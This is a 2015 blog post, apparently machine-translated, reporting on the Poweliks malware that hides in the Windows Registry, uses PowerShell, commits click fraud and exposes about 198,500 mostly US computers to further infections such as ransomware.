Friday, 12 June 2015

Registry Malware Infecting Nearly 200,000 Computers

Malware that only in the Windows Registry is hiding in order to avoid detection and removal has in recent months nearly 200,000 infected computers. It is the Poweliks malware that infected computers used for click fraud and even a zero-day vulnerability in Windows applied to take over a computer completely.Once active Poweliks will first check whether Windows PowerShell is present.

This is a scripting language that allows system administrators to automate many tasks. It is present by default in Windows 7 and can also be installed on other versions of Windows. In case PowerShell is not present is downloaded and installed. Power Shell will later be used to conduct an encoded script file.

This script file contains malware, and makes it possible to download and install additional malware. Then, a key in the Windows Registry created so that the malware is also loaded at the next reboot of the system. By not using a file, like most malware does, but who are completely in the Windows Registry to hide would be more difficult to detect and remove Poweliks.


The malware aims to commit click fraud, where there are visited all kinds of pages that contain advertisements via a hidden browser window. The criminals are paid for every ad displayed. One problem for victims of Poweliks is that the ads displayed itself may be malicious. Poweliks infected with a computer can therefore become infected with a variety of other threats, including ransomware.

According to anti-virus company Symantec , a report ( pdf ) published on the malware, there are many cases in which there was downloaded ransomware through the ads displayed. Remarkably, the malware is active mainly in the United States. Of the 198,500 infected computers showed that 99.5% were in the US. However, that does not mean that users in other countries are not at risk. The virus fighter says that Poweliks shows what future threats may do, with cyber criminals are even more determined to make money from their creations.

No comments:

Post a Comment